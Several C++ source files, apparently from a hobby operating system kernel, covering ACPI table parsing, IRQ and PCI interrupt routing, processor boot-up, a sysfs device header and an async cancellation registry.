std::cout << (int)r->Data.Irq.Interrupts[i];
}
std::cout << ")" << std::endl;
}else if(r->Type == ACPI_RESOURCE_TYPE_EXTENDED_IRQ) {
indent();
std::cout << "* Resource: Irq (";
for(uint8_t i = 0; i < r->Data.ExtendedIrq.InterruptCount; i++) {
if(i)
std::cout << ", ";
std::cout << (int)r->Data.ExtendedIrq.Interrupts[i];
}
std::cout << ")" << std::endl;
}else if(r->Type == ACPI_RESOURCE_TYPE_DMA) {
indent();
std::cout << "* Resource: Dma" << std::endl;
}else if(r->Type == ACPI_RESOURCE_TYPE_IO) {
indent();
std::cout << "* Resource: Io ("
<< std::hex << "Base: 0x" << r->Data.Io.Minimum
<< ", Length: 0x" << (int)r->Data.Io.AddressLength << std::dec
<< ")" << std::endl;
}else if(r->Type == ACPI_RESOURCE_TYPE_ADDRESS16) {
indent();
std::cout << "* Resource: Address16 ("
<< std::hex << "Base: 0x" << r->Data.Address16.Address.Minimum
<< ", Length: 0x" << r->Data.Address16.Address.AddressLength << std::dec
<< ")" << std::endl;
}else if(r->Type == ACPI_RESOURCE_TYPE_ADDRESS32) {
indent();
std::cout << "* Resource: Address32 ("
<< std::hex << "Base: 0x" << r->Data.Address32.Address.Minimum
<< ", Length: 0x" << r->Data.Address32.Address.AddressLength << std::dec
<< ")" << std::endl;
}else if(r->Type != ACPI_RESOURCE_TYPE_END_TAG) {
indent();
std::cout << "* Resource: [Type 0x"
<< std::hex << r->Type << std::dec << "]" << std::endl;
}
});
}
*/
/* if(strcmp(segment, "PCI0") == 0) {
ACPI_BUFFER rt_buffer;
rt_buffer.Pointer = nullptr;
rt_buffer.Length = ACPI_ALLOCATE_BUFFER;
ACPICA_CHECK(AcpiGetIrqRoutingTable(object, &rt_buffer));
frigg::infoLogger() << "Routing table:" << frigg::endLog;
size_t offset = 0;
while(true) {
assert(offset < rt_buffer.Length);
auto entry = (ACPI_PCI_ROUTING_TABLE *)((char *)rt_buffer.Pointer + offset);
if(entry->Length == 0)
break;
frigg::infoLogger() << "Pin: " << entry->Pin
<< ", source: " << (const char *)entry->Source << frigg::endLog;
offset += entry->Length;
}
AcpiOsFree(rt_buffer.Pointer);
}
*/
/*
auto children = getChildren(object);
for(ACPI_HANDLE child : children)
dumpNamespace(child, depth + 1);
}
void dumpNamespace() {
auto children = getChildren(ACPI_ROOT_OBJECT);
for(ACPI_HANDLE child : children)
dumpNamespace(child);
}
void pciDiscover(); // TODO: put this in a header file
*/
namespace thor {
namespace acpi {
// Panic handler invoked by the ACPICA_CHECK macro when an ACPICA call
// does not return AE_OK; logs the failing expression and location.
void acpicaCheckFailed(const char *expr, const char *file, int line) {
	frigg::panicLogger() << "ACPICA_CHECK failed: "
			<< expr << "\nIn file " << file << " on line " << line
			<< frigg::endLog;
}
#define ACPICA_CHECK(expr) do { if((expr) != AE_OK) { \
acpicaCheckFailed(#expr, __FILE__, __LINE__); } } while(0)
// In-memory layouts of ACPI MADT ("APIC" table) entries, mirroring the
// structures of the ACPI specification. Only some entries need
// __attribute__((packed)); for the others the default layout already
// places every field at its specified offset.

// Fixed part of the MADT that follows the common ACPI table header.
struct MadtHeader {
	uint32_t localApicAddress;
	uint32_t flags;
};

// Common prefix of every MADT entry; length is used to walk the table.
struct MadtGenericEntry {
	uint8_t type;
	uint8_t length;
};

// Type 0: processor-local APIC.
struct MadtLocalEntry {
	MadtGenericEntry generic;
	uint8_t processorId;
	uint8_t localApicId;
	uint32_t flags;
};

namespace local_flags {
	// Set if the processor is enabled and usable by the OS.
	static constexpr uint32_t enabled = 1;
};

// Type 1: I/O APIC.
struct MadtIoEntry {
	MadtGenericEntry generic;
	uint8_t ioApicId;
	uint8_t reserved;
	uint32_t mmioAddress;
	uint32_t systemIntBase;
};

// Polarity / trigger-mode bit fields of the interrupt override flags.
enum OverrideFlags {
	polarityMask = 0x03,
	polarityDefault = 0x00,
	polarityHigh = 0x01,
	polarityLow = 0x03,

	triggerMask = 0x0C,
	triggerDefault = 0x00,
	triggerEdge = 0x04,
	triggerLevel = 0x0C
};

// Type 2: interrupt source override (ISA IRQ -> GSI remapping).
struct MadtIntOverrideEntry {
	MadtGenericEntry generic;
	uint8_t bus;
	uint8_t sourceIrq;
	uint32_t systemInt;
	uint16_t flags;
};

// Type 4: local APIC NMI source. Packed: without it, the uint16_t flags
// would be aligned to offset 4 instead of the specified offset 3.
struct MadtLocalNmiEntry {
	MadtGenericEntry generic;
	uint8_t processorId;
	uint16_t flags;
	uint8_t localInt;
} __attribute__ (( packed ));

// Body of the ACPI HPET table (after the common table header).
struct HpetEntry {
	uint32_t generalCapsAndId;
	ACPI_GENERIC_ADDRESS address;
	uint8_t hpetNumber;
	uint16_t minimumTick;
	uint8_t pageProtection;
} __attribute__ (( packed ));
// --------------------------------------------------------
// RAII owner of an ACPI_BUFFER that ACPICA allocates on our behalf
// (Length = ACPI_ALLOCATE_BUFFER). The storage is released via
// AcpiOsFree on destruction. Move-only type.
struct ScopedBuffer {
	friend void swap(ScopedBuffer &a, ScopedBuffer &b) {
		using std::swap;
		swap(a._object, b._object);
	}

	// ACPI_ALLOCATE_BUFFER asks ACPICA to allocate the buffer itself.
	ScopedBuffer() {
		_object.Length = ACPI_ALLOCATE_BUFFER;
		_object.Pointer = nullptr;
	}

	ScopedBuffer(const ScopedBuffer &) = delete;

	ScopedBuffer(ScopedBuffer &&other)
	: ScopedBuffer() {
		swap(*this, other);
	}

	~ScopedBuffer() {
		if(_object.Pointer)
			AcpiOsFree(_object.Pointer);
	}

	// Copy-and-swap; only moves can construct the by-value argument
	// since the copy constructor is deleted.
	ScopedBuffer &operator= (ScopedBuffer other) {
		swap(*this, other);
		return *this;
	}

	// Size of the data ACPICA wrote; only valid after a successful call.
	size_t size() {
		assert(_object.Pointer);
		return _object.Length;
	}

	void *data() {
		assert(_object.Pointer);
		return _object.Pointer;
	}

	// Raw ACPI_BUFFER for passing to ACPICA output parameters.
	ACPI_BUFFER *get() {
		return &_object;
	}

private:
	ACPI_BUFFER _object;
};
// Collects all immediate children of the given ACPI namespace object.
frigg::Vector<ACPI_HANDLE, KernelAlloc> getChildren(ACPI_HANDLE parent) {
	frigg::Vector<ACPI_HANDLE, KernelAlloc> children{*kernelAlloc};
	for(ACPI_HANDLE node = nullptr;;) {
		// Passing the previous child continues the iteration.
		ACPI_STATUS status = AcpiGetNextObject(ACPI_TYPE_ANY, parent, node, &node);
		if(status == AE_NOT_FOUND)
			break;
		ACPICA_CHECK(status);
		children.push(node);
	}
	return children;
}
// Returns true iff the given namespace object has an immediate child
// whose single-segment name equals the given path.
bool hasChild(ACPI_HANDLE parent, const char *path) {
	for(ACPI_HANDLE node = nullptr;;) {
		ACPI_STATUS status = AcpiGetNextObject(ACPI_TYPE_ANY, parent, node, &node);
		if(status == AE_NOT_FOUND)
			return false;
		ACPICA_CHECK(status);

		acpi::ScopedBuffer buffer;
		ACPICA_CHECK(AcpiGetName(node, ACPI_SINGLE_NAME, buffer.get()));
		if(!strcmp(static_cast<char *>(buffer.data()), path))
			return true;
	}
}
// Resolves a path relative to the given namespace object.
// Panics (via ACPICA_CHECK) if the path does not exist.
ACPI_HANDLE getChild(ACPI_HANDLE parent, const char *path) {
	ACPI_HANDLE result;
	ACPICA_CHECK(AcpiGetHandle(parent, const_cast<char *>(path), &result));
	return result;
}
// Evaluates an ACPI object that yields an integer and returns its value.
uint64_t evaluate(ACPI_HANDLE handle) {
	acpi::ScopedBuffer buffer;
	ACPICA_CHECK(AcpiEvaluateObject(handle, nullptr, nullptr, buffer.get()));
	auto result = static_cast<ACPI_OBJECT *>(buffer.data());
	assert(result->Type == ACPI_TYPE_INTEGER);
	return result->Integer.Value;
}
// Evaluates an ACPI method with a single integer argument of value one,
// discarding any result (used e.g. for _PIC-style notifications).
void evaluateWith1(ACPI_HANDLE handle) {
	ACPI_OBJECT arg;
	arg.Integer.Type = ACPI_TYPE_INTEGER;
	arg.Integer.Value = 1;

	ACPI_OBJECT_LIST list;
	list.Count = 1;
	list.Pointer = &arg;
	ACPICA_CHECK(AcpiEvaluateObject(handle, nullptr, &list, nullptr));
}
// Invokes functor for every resource returned by the given resource
// method (e.g. "_CRS") of an ACPI object. The functor is passed through
// ACPICA's C callback interface via the context pointer.
template<typename F>
void walkResources(ACPI_HANDLE object, const char *method, F functor) {
	// Capture-less lambda so that it converts to a plain function pointer.
	auto fptr = [] (ACPI_RESOURCE *r, void *c) -> ACPI_STATUS {
		(*static_cast<F *>(c))(r);
		return AE_OK;
	};
	ACPICA_CHECK(AcpiWalkResources(object, const_cast<char *>(method), fptr, &functor));
}
// --------------------------------------------------------
// Trigger-mode/polarity pair of an IRQ line. The null enumerators mean
// "not yet configured".
struct IrqConfiguration {
	// True once both trigger mode and polarity have been determined.
	bool specified() {
		return trigger != TriggerMode::null
				&& polarity != Polarity::null;
	}

	// True if the other configuration can coexist on the same line.
	// Must only be called on a fully specified configuration.
	bool compatible(IrqConfiguration other) {
		assert(specified());
		return trigger == other.trigger
				&& polarity == other.polarity;
	}

	TriggerMode trigger;
	Polarity polarity;
};
// A global system interrupt together with its electrical configuration.
struct IrqLine {
	unsigned int gsi;
	IrqConfiguration configuration;
};
// Identity mapping for a legacy ISA IRQ with the conventional
// edge-triggered, active-high configuration.
IrqLine defaultIrq(unsigned int irq) {
	IrqConfiguration config{TriggerMode::edge, Polarity::high};
	return IrqLine{irq, config};
}
frigg::LazyInitializer<frigg::Optional<IrqLine>> irqOverrides[16];
// Maps an ISA IRQ to its GSI and configuration, honoring any MADT
// interrupt source override; falls back to the identity default.
IrqLine resolveIrq(unsigned int irq) {
	assert(irq < 16);
	auto &entry = *irqOverrides[irq];
	if(!entry)
		return defaultIrq(irq);
	return *entry;
}
// Returns the effective line for an IRQ given a desired configuration.
// If a MADT override exists for an ISA IRQ it takes precedence; the
// desired configuration must then agree with the override.
IrqLine overrideIrq(unsigned int irq, IrqConfiguration desired) {
	if(irq >= 16 || !(*irqOverrides[irq]))
		return IrqLine{irq, desired};
	auto line = *(*irqOverrides[irq]);
	assert(desired.compatible(line.configuration));
	return line;
}
// --------------------------------------------------------
// Programs the interrupt controller pin behind the line's GSI with the
// line's trigger mode and polarity.
void commitIrq(IrqLine line) {
	auto config = line.configuration;
	getGlobalSystemIrq(line.gsi)->configure(config.trigger, config.polarity);
}
// --------------------------------------------------------
// ACPI fixed-event handler for the power button: transitions the machine
// to the S5 (soft-off) sleep state.
// NOTE(review): AcpiEnterSleepState(5) should power the machine off, so
// the return is presumably never reached — confirm on real hardware.
uint32_t handlePowerButton(void *context) {
	frigg::infoLogger() << "thor: Preparing for shutdown" << frigg::endLog;
	ACPICA_CHECK(AcpiEnterSleepStatePrep(5));
	ACPICA_CHECK(AcpiEnterSleepState(5));
	return ACPI_INTERRUPT_HANDLED;
}
// Generic ACPI event callback; currently only logs the event category.
void dispatchEvent(uint32_t type, ACPI_HANDLE device, uint32_t number, void *context) {
	if(type == ACPI_EVENT_TYPE_FIXED) {
		frigg::infoLogger() << "thor: Fixed ACPI event" << frigg::endLog;
		return;
	}
	// Anything that is not a fixed event must be a GPE.
	assert(type == ACPI_EVENT_TYPE_GPE);
	frigg::infoLogger() << "thor: ACPI GPE event" << frigg::endLog;
}
// --------------------------------------------------------
// Queries the hardware ID (_HID) of a namespace object.
// Returns an empty string if the object has none.
frigg::String<KernelAlloc> getHardwareId(ACPI_HANDLE handle) {
	ACPI_DEVICE_INFO *info;
	ACPICA_CHECK(AcpiGetObjectInfo(handle, &info));

	frigg::String<KernelAlloc> id{*kernelAlloc};
	if(info->HardwareId.Length) {
		// Length includes the null terminator; strip it.
		id = frigg::String<KernelAlloc>{*kernelAlloc,
				info->HardwareId.String, info->HardwareId.Length - 1};
	}
	ACPI_FREE(info);
	return id;
}
// --------------------------------------------------------
IrqConfiguration irqConfig[24];
// Programs a GSI with the desired trigger/polarity the first time it is
// requested; any later request for the same GSI must match the recorded
// configuration.
void configureIrq(unsigned int gsi, IrqConfiguration desired) {
	assert(gsi < 24);
	assert(desired.specified());
	if(irqConfig[gsi].specified()) {
		assert(irqConfig[gsi].compatible(desired));
		return;
	}
	getGlobalSystemIrq(gsi)->configure(desired.trigger, desired.polarity);
	irqConfig[gsi] = desired;
}
// Queries the _CRS of a PCI interrupt link device (e.g. \_SB.LNKA),
// configures the GSI it currently routes to and returns the matching
// IrqPin. Returns nullptr if _STA reports the link device as not
// present or not enabled.
IrqPin *configureRoute(const char *link_path) {
	auto decodeTrigger = [] (unsigned int trigger) {
		switch(trigger) {
		case ACPI_LEVEL_SENSITIVE: return TriggerMode::level;
		case ACPI_EDGE_SENSITIVE: return TriggerMode::edge;
		default: frigg::panicLogger() << "Bad ACPI IRQ trigger mode" << frigg::endLog;
		}
	};
	auto decodePolarity = [] (unsigned int polarity) {
		switch(polarity) {
		case ACPI_ACTIVE_HIGH: return Polarity::high;
		case ACPI_ACTIVE_LOW: return Polarity::low;
		default: frigg::panicLogger() << "Bad ACPI IRQ polarity" << frigg::endLog;
		}
	};

	// TODO: Hack to null-terminate the string.
	auto handle = getChild(ACPI_ROOT_OBJECT, link_path);

	// _STA bit 0: device present; bit 1: device enabled.
	if(hasChild(handle, "_STA")) {
		auto status = evaluate(getChild(handle, "_STA"));
		if(!(status & 1)) {
			frigg::infoLogger() << " Link device is not present." << frigg::endLog;
			return nullptr;
		}else if(!(status & 2)) {
			frigg::infoLogger() << " Link device is not enabled." << frigg::endLog;
			return nullptr;
		}
	}

	IrqPin *pin = nullptr;
	walkResources(handle, "_CRS", [&] (ACPI_RESOURCE *r) {
		if(r->Type == ACPI_RESOURCE_TYPE_IRQ) {
			assert(r->Data.Irq.InterruptCount == 1);
			// Fix: this descriptor is an ACPI_RESOURCE_IRQ, so read the
			// trigger mode and polarity from Data.Irq. The previous code
			// read the ExtendedIrq union member here, which only happened
			// to work because both structs place Triggering and Polarity
			// at the same offsets.
			auto trigger = decodeTrigger(r->Data.Irq.Triggering);
			auto polarity = decodePolarity(r->Data.Irq.Polarity);
			frigg::infoLogger() << " Resource: Irq "
					<< (int)r->Data.Irq.Interrupts[0]
					<< ", trigger mode: " << static_cast<int>(trigger)
					<< ", polarity: " << static_cast<int>(polarity)
					<< frigg::endLog;
			assert(!pin); // We expect at most one IRQ resource in _CRS.
			configureIrq(r->Data.Irq.Interrupts[0], {trigger, polarity});
			pin = getGlobalSystemIrq(r->Data.Irq.Interrupts[0]);
		}else if(r->Type == ACPI_RESOURCE_TYPE_EXTENDED_IRQ) {
			assert(r->Data.ExtendedIrq.InterruptCount == 1);
			auto trigger = decodeTrigger(r->Data.ExtendedIrq.Triggering);
			auto polarity = decodePolarity(r->Data.ExtendedIrq.Polarity);
			frigg::infoLogger() << " Resource: Extended Irq "
					<< (int)r->Data.ExtendedIrq.Interrupts[0]
					<< ", trigger mode: " << static_cast<int>(trigger)
					<< ", polarity: " << static_cast<int>(polarity)
					<< frigg::endLog;
			assert(!pin);
			configureIrq(r->Data.ExtendedIrq.Interrupts[0], {trigger, polarity});
			pin = getGlobalSystemIrq(r->Data.ExtendedIrq.Interrupts[0]);
		}else if(r->Type != ACPI_RESOURCE_TYPE_END_TAG) {
			frigg::infoLogger() << " Resource: [Type "
					<< r->Type << "]" << frigg::endLog;
		}
	});
	assert(pin);
	return pin;
}
// Walks \_SB_ for PCI host bridges (PNP0A03 / PNP0A08), builds the PCI
// interrupt routing table from the bridge's _PRT and kicks off PCI
// discovery for each bridge found.
void enumerateSystemBusses() {
	auto sb = getChild(ACPI_ROOT_OBJECT, "_SB_");
	for(auto child : getChildren(sb)) {
		auto id = getHardwareId(child);
		// PNP0A03: PCI host bridge; PNP0A08: PCI Express root bridge.
		if(id != "PNP0A03" && id != "PNP0A08")
			continue;

		frigg::infoLogger() << "thor: Found PCI host bridge" << frigg::endLog;
		pci::RoutingInfo routing{*kernelAlloc};

		acpi::ScopedBuffer buffer;
		ACPICA_CHECK(AcpiGetIrqRoutingTable(child, buffer.get()));
		size_t offset = 0;
		while(true) {
			auto route = (ACPI_PCI_ROUTING_TABLE *)((char *)buffer.data() + offset);
			// A zero-length entry terminates the table.
			if(!route->Length)
				break;
			// The high word of Address is the device/slot number; the low
			// word is the function, which _PRT specifies as 0xFFFF
			// (i.e. "all functions").
			auto slot = route->Address >> 16;
			auto function = route->Address & 0xFFFF;
			assert(function == 0xFFFF);
			// Pin 0 corresponds to INTA; IrqIndex presumably starts at 1
			// with 0 = null — confirm against the IrqIndex definition.
			auto index = static_cast<pci::IrqIndex>(route->Pin + 1);
			if(!*route->Source) {
				// An empty source string: the entry names a fixed GSI.
				frigg::infoLogger() << " Route for slot " << slot
						<< ", " << nameOf(index) << ": "
						<< "GSI " << route->SourceIndex << frigg::endLog;
				configureIrq(route->SourceIndex, {TriggerMode::level, Polarity::low});
				auto pin = getGlobalSystemIrq(route->SourceIndex);
				routing.push({slot, index, pin});
			}else{
				// Otherwise the entry names an interrupt link device.
				frigg::infoLogger() << " Route for slot " << slot
						<< ", " << nameOf(index) << ": " << (const char *)route->Source
						<< "[" << route->SourceIndex << "]" << frigg::endLog;
				assert(!route->SourceIndex);
				auto pin = configureRoute(const_cast<const char *>(route->Source));
				routing.push({slot, index, pin});
			}
			offset += route->Length;
		}

		pci::pciDiscover(routing);
	}
}
// --------------------------------------------------------
// Walks the MADT ("APIC" table) and starts every enabled application
// processor via bootSecondary().
void bootOtherProcessors() {
	ACPI_TABLE_HEADER *madt;
	ACPICA_CHECK(AcpiGetTable(const_cast<char *>("APIC"), 0, &madt));

	frigg::infoLogger() << "thor: Booting APs." << frigg::endLog;

	// Entries start after the fixed MADT header; each carries its own length.
	size_t offset = sizeof(ACPI_TABLE_HEADER) + sizeof(MadtHeader);
	while(offset < madt->Length) {
		auto generic = (MadtGenericEntry *)((uint8_t *)madt + offset);
		if(generic->type == 0) { // local APIC
			auto entry = (MadtLocalEntry *)generic;
			// TODO: Support BSPs with APIC ID != 0.
			if((entry->flags & local_flags::enabled)
					&& entry->localApicId) // We ignore the BSP here.
				bootSecondary(entry->localApicId);
		}
		offset += generic->length;
	}
}
// --------------------------------------------------------
// Logs every entry of the ACPI MADT ("APIC" table) for diagnostics.
// This function only prints; interrupt controllers are configured
// elsewhere.
void dumpMadt() {
	ACPI_TABLE_HEADER *madt;
	ACPICA_CHECK(AcpiGetTable(const_cast<char *>("APIC"), 0, &madt));

	frigg::infoLogger() << "thor: Dumping MADT" << frigg::endLog;

	// Entries start after the fixed MADT header; each carries its own length.
	size_t offset = sizeof(ACPI_TABLE_HEADER) + sizeof(MadtHeader);
	while(offset < madt->Length) {
		auto generic = (MadtGenericEntry *)((uintptr_t)madt + offset);
		if(generic->type == 0) { // local APIC
			auto entry = (MadtLocalEntry *)generic;
			frigg::infoLogger() << " Local APIC id: "
					<< (int)entry->localApicId
					<< ((entry->flags & local_flags::enabled) ? "" :" (disabled)")
					<< frigg::endLog;

			// TODO: This has to be refactored.
//			uint32_t id = entry->localApicId;
//			if(seen_bsp)
//				helControlKernel(kThorSubArch, kThorIfBootSecondary,
//						&id, nullptr);
//			seen_bsp = 1;
		}else if(generic->type == 1) { // I/O APIC
			auto entry = (MadtIoEntry *)generic;
			// Note: "sytem" is a typo in the log string; left untouched here.
			frigg::infoLogger() << " I/O APIC id: " << (int)entry->ioApicId
					<< ", sytem interrupt base: " << (int)entry->systemIntBase
					<< frigg::endLog;
		}else if(generic->type == 2) { // interrupt source override
			auto entry = (MadtIntOverrideEntry *)generic;

			// Decode the flags into human-readable strings; any reserved
			// combination is treated as a fatal firmware bug.
			const char *bus, *polarity, *trigger;
			if(entry->bus == 0) {
				bus = "ISA";
			}else{
				frigg::panicLogger() << "Unexpected bus in MADT interrupt override"
						<< frigg::endLog;
			}

			if((entry->flags & OverrideFlags::polarityMask) == OverrideFlags::polarityDefault) {
				polarity = "default";
			}else if((entry->flags & OverrideFlags::polarityMask) == OverrideFlags::polarityHigh) {
				polarity = "high";
			}else if((entry->flags & OverrideFlags::polarityMask) == OverrideFlags::polarityLow) {
				polarity = "low";
			}else{
				frigg::panicLogger() << "Unexpected polarity in MADT interrupt override"
						<< frigg::endLog;
			}

			if((entry->flags & OverrideFlags::triggerMask) == OverrideFlags::triggerDefault) {
				trigger = "default";
			}else if((entry->flags & OverrideFlags::triggerMask) == OverrideFlags::triggerEdge) {
				trigger = "edge";
			}else if((entry->flags & OverrideFlags::triggerMask) == OverrideFlags::triggerLevel) {
				trigger = "level";
			}else{
				frigg::panicLogger() << "Unexpected trigger mode in MADT interrupt override"
						<< frigg::endLog;
			}

			frigg::infoLogger() << " Int override: " << bus << " IRQ " << (int)entry->sourceIrq
					<< " is mapped to GSI " << entry->systemInt
					<< " (Polarity: " << polarity << ", trigger mode: " << trigger
					<< ")" << frigg::endLog;
		}else if(generic->type == 4) { // local APIC NMI source
			auto entry = (MadtLocalNmiEntry *)generic;
			frigg::infoLogger() << " Local APIC NMI: processor " << (int)entry->processorId
					<< ", lint: " << (int)entry->localInt << frigg::endLog;
		}else{
			frigg::infoLogger() << " Unexpected MADT entry of type "
					<< generic->type << frigg::endLog;
		}
		offset += generic->length;
	}
}
// First stage of ACPI bring-up: initializes ACPICA table management,
// programs the I/O APICs listed in the MADT, records the ISA IRQ override
// table and starts the HPET. Runs before the full ACPICA namespace init
// performed by initializeExtendedSystem().
void initializeBasicSystem() {
	ACPICA_CHECK(AcpiInitializeSubsystem());
	// 16 = number of pre-allocated table descriptors.
	ACPICA_CHECK(AcpiInitializeTables(nullptr, 16, FALSE));
	ACPICA_CHECK(AcpiLoadTables());
	frigg::infoLogger() << "thor: ACPICA initialized." << frigg::endLog;

	dumpMadt();

	ACPI_TABLE_HEADER *madt;
	ACPICA_CHECK(AcpiGetTable(const_cast<char *>("APIC"), 0, &madt));

	// Configure all interrupt controllers.
	// TODO: This should be done during thor's initialization in order to avoid races.
	frigg::infoLogger() << "thor: Configuring I/O APICs." << frigg::endLog;

	// First MADT pass: set up every I/O APIC (entry type 1). MADT entries
	// are variable-length; each generic entry carries its own length field.
	size_t offset = sizeof(ACPI_TABLE_HEADER) + sizeof(MadtHeader);
	while(offset < madt->Length) {
		auto generic = (MadtGenericEntry *)((uint8_t *)madt + offset);
		if(generic->type == 1) { // I/O APIC
			auto entry = (MadtIoEntry *)generic;
			// Only an I/O APIC covering GSI base 0 is handled here.
			assert(!entry->systemIntBase);
			setupIoApic(entry->mmioAddress);
		}
		offset += generic->length;
	}

	// Determine IRQ override configuration.
	for(int i = 0; i < 16; i++)
		irqOverrides[i].initialize();

	// Second MADT pass: record interrupt source overrides (entry type 2),
	// which remap ISA IRQs to GSIs with explicit trigger/polarity.
	offset = sizeof(ACPI_TABLE_HEADER) + sizeof(MadtHeader);
	while(offset < madt->Length) {
		auto generic = (MadtGenericEntry *)((uint8_t *)madt + offset);
		if(generic->type == 2) { // interrupt source override
			auto entry = (MadtIntOverrideEntry *)generic;

			// ACPI defines only ISA IRQ overrides.
			assert(entry->bus == 0);
			assert(entry->sourceIrq < 16);

			IrqLine line;
			line.gsi = entry->systemInt;

			auto trigger = entry->flags & OverrideFlags::triggerMask;
			auto polarity = entry->flags & OverrideFlags::polarityMask;
			if(trigger == OverrideFlags::triggerDefault
					&& polarity == OverrideFlags::polarityDefault) {
				// Bus-conforming: ISA IRQs default to edge-triggered, active-high.
				line.configuration.trigger = TriggerMode::edge;
				line.configuration.polarity = Polarity::high;
			}else{
				// NOTE(review): entries that mix one default field with one
				// explicit field are rejected by the asserts below — confirm
				// that no firmware in the wild emits such entries.
				assert(trigger != OverrideFlags::triggerDefault);
				assert(polarity != OverrideFlags::polarityDefault);

				switch(trigger) {
				case OverrideFlags::triggerEdge:
					line.configuration.trigger = TriggerMode::edge; break;
				case OverrideFlags::triggerLevel:
					line.configuration.trigger = TriggerMode::level; break;
				default:
					frigg::panicLogger() << "Illegal IRQ trigger mode in MADT" << frigg::endLog;
				}

				switch(polarity) {
				case OverrideFlags::polarityHigh:
					line.configuration.polarity = Polarity::high; break;
				case OverrideFlags::polarityLow:
					line.configuration.polarity = Polarity::low; break;
				default:
					frigg::panicLogger() << "Illegal IRQ polarity in MADT" << frigg::endLog;
				}
			}

			// Each ISA IRQ may be overridden at most once.
			assert(!(*irqOverrides[entry->sourceIrq]));
			*irqOverrides[entry->sourceIrq] = line;
		}
		offset += generic->length;
	}

	// Initialize the HPET.
	frigg::infoLogger() << "thor: Setting up HPET." << frigg::endLog;
	ACPI_TABLE_HEADER *hpet_table;
	ACPICA_CHECK(AcpiGetTable(const_cast<char *>("HPET"), 0, &hpet_table));

	auto hpet_entry = (HpetEntry *)((uintptr_t)hpet_table + sizeof(ACPI_TABLE_HEADER));
	// Only memory-mapped HPETs are supported.
	assert(hpet_entry->address.SpaceId == ACPI_ADR_SPACE_SYSTEM_MEMORY);
	setupHpet(hpet_entry->address.Address);
}
// Second stage of ACPI bring-up: routes the legacy ISA IRQs, switches the
// firmware into ACPI mode, installs event handlers, boots the application
// processors and enumerates the system busses.
void initializeExtendedSystem() {
	// Configure the ISA IRQs.
	// TODO: This is a hack. We assume that HPET will use legacy replacement
	// and that SCI is routed to IRQ 9.
	frigg::infoLogger() << "thor: Configuring ISA IRQs." << frigg::endLog;
	commitIrq(resolveIrq(0));  // Timer (HPET legacy replacement).
	commitIrq(resolveIrq(1));  // PS/2 keyboard.
	commitIrq(resolveIrq(4));  // COM1 serial.
	commitIrq(resolveIrq(9));  // ACPI SCI (assumed, see TODO above).
	commitIrq(resolveIrq(12)); // PS/2 mouse.
	commitIrq(resolveIrq(14)); // Primary ATA channel.

	frigg::infoLogger() << "thor: Entering ACPI mode." << frigg::endLog;
	ACPICA_CHECK(AcpiEnableSubsystem(ACPI_FULL_INITIALIZATION));

	ACPICA_CHECK(AcpiInstallFixedEventHandler(ACPI_EVENT_POWER_BUTTON,
			&handlePowerButton, nullptr));
	ACPICA_CHECK(AcpiInstallGlobalEventHandler(&dispatchEvent, nullptr));

	ACPICA_CHECK(AcpiInitializeObjects(ACPI_FULL_INITIALIZATION));

	// Tell the firmware that we use I/O APICs by evaluating \_PIC with
	// argument 1, if the method exists.
	if(hasChild(ACPI_ROOT_OBJECT, "_PIC")) {
		frigg::infoLogger() << "thor: Invoking \\_PIC method" << frigg::endLog;
		evaluateWith1(getChild(ACPI_ROOT_OBJECT, "_PIC"));
	}

	bootOtherProcessors();

	enumerateSystemBusses();

	initializePmInterface();

	frigg::infoLogger() << "thor: System configuration complete." << frigg::endLog;
}
} } // namespace thor::acpi
<file_sep>
#include "file.hpp"
namespace inotify {
smarter::shared_ptr<File, FileHandle> createFile();
} // namespace inotify
<file_sep>#ifndef POSIX_SUBSYSTEM_DRVCORE_HPP
#define POSIX_SUBSYSTEM_DRVCORE_HPP
#include <string>
#include "device.hpp"
#include "sysfs.hpp"
namespace drvcore {

// This struct corresponds to Linux' struct Device (i.e. a device that is part of sysfs).
// TODO: Make the sysfs::Object private?
struct Device : sysfs::Object {
	// `parent` is the enclosing sysfs device (presumably may be null for
	// root devices — TODO confirm against callers), `name` is the sysfs
	// directory name, `unix_device` is the backing UNIX device node.
	Device(std::shared_ptr<Device> parent, std::string name, UnixDevice *unix_device);

	// Returns the (non-owned) UnixDevice that backs this sysfs device.
	UnixDevice *unixDevice() {
		return _unixDevice;
	}

private:
	UnixDevice *_unixDevice;
};

// Sets up the drvcore subsystem; call once at startup.
void initialize();

// Registers a device and makes it visible to the rest of the subsystem.
void installDevice(std::shared_ptr<Device> device);

// Broadcasts a hotplug (uevent-style) message; `buffer` is the raw payload.
void emitHotplug(std::string buffer);

} // namespace drvcore
#endif // POSIX_SUBSYSTEM_DRVCORE_HPP
<file_sep>
#include "cancel.hpp"
#include "core.hpp"
namespace thor {
// Nodes start unregistered; _registry and _asyncId are filled in by
// CancelRegistry::issue().
CancelNode::CancelNode()
: _registry{}, _asyncId{0}, _cancelCalled{false} { }

// Unlinks this node from its registry once the operation has finished,
// so that its async ID can no longer be targeted by cancel().
void CancelNode::finalizeCancel() {
	// Lock order: IRQ mutex first, then the registry mutex.
	auto irq_lock = frigg::guard(&irqMutex());
	auto lock = frigg::guard(&_registry->_mutex);

	_registry->_nodeMap.remove(_asyncId);
}

CancelRegistry::CancelRegistry()
: _nodeMap{frigg::DefaultHasher<uint64_t>{}, *kernelAlloc}, _nextAsyncId{1} { }

// Assigns a fresh async ID to `node` and links it into this registry.
// The node must not have been issued before.
void CancelRegistry::issue(CancelNode *node) {
	assert(!node->_registry && !node->_asyncId);

	auto irq_lock = frigg::guard(&irqMutex());
	auto lock = frigg::guard(&_mutex);

	uint64_t id = _nextAsyncId++;
	_nodeMap.insert(id, node);

	// The node keeps the registry alive via a shared pointer.
	node->_registry = _selfPtr.toShared();
	node->_asyncId = id;
}

// Cancels the operation identified by `async_id`, if it is still live.
// handleCancel() is invoked on the node outside of the registry lock.
void CancelRegistry::cancel(uint64_t async_id) {
	// TODO: We need QSGC here to prevent concurrent destruction of the node.
	CancelNode *node;
	{
		auto irq_lock = frigg::guard(&irqMutex());
		auto lock = frigg::guard(&_mutex);

		// TODO: Return an error in this case.
		assert(async_id && async_id < _nextAsyncId);

		// Nodes that already completed were removed by finalizeCancel().
		auto it = _nodeMap.get(async_id);
		if(!it)
			return;
		node = *it;
	}

	assert(!node->_cancelCalled);
	node->_cancelCalled = true;
	node->handleCancel();
}
} // namespace thor
<file_sep>
#include <assert.h>
#include <stdio.h>
#include <deque>
#include <experimental/optional>
#include <functional>
#include <iostream>
#include <memory>
#include <numeric>
#include <arch/bits.hpp>
#include <arch/register.hpp>
#include <arch/io_space.hpp>
#include <async/result.hpp>
#include <boost/intrusive/list.hpp>
